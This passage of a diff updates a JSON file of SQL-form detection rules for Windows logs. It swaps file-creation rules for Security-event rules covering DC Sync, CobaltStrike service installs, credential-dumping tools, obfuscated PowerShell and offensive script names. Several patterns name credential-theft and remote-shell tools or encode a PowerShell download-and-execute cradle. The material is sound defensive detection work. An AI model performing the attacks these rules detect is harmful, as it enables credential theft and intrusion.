'%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + 
"Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of remote PowerShell execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r 
%' ESCAPE '\\'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": 
"bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - 
"tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such 
as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects well-known credential dumping tools execution via 
service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.credential_access", + "attack.execution", "attack.t1003.001", "attack.t1003.002", - "attack.t1003.003", "attack.t1003.004", - "attack.t1003.005" + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Dumpy.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1203", "attack.execution", - "cve.2021.26858" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE 
(Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -23906,205 +23357,226 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "AD Privileged Users or Groups Reconnaissance", + 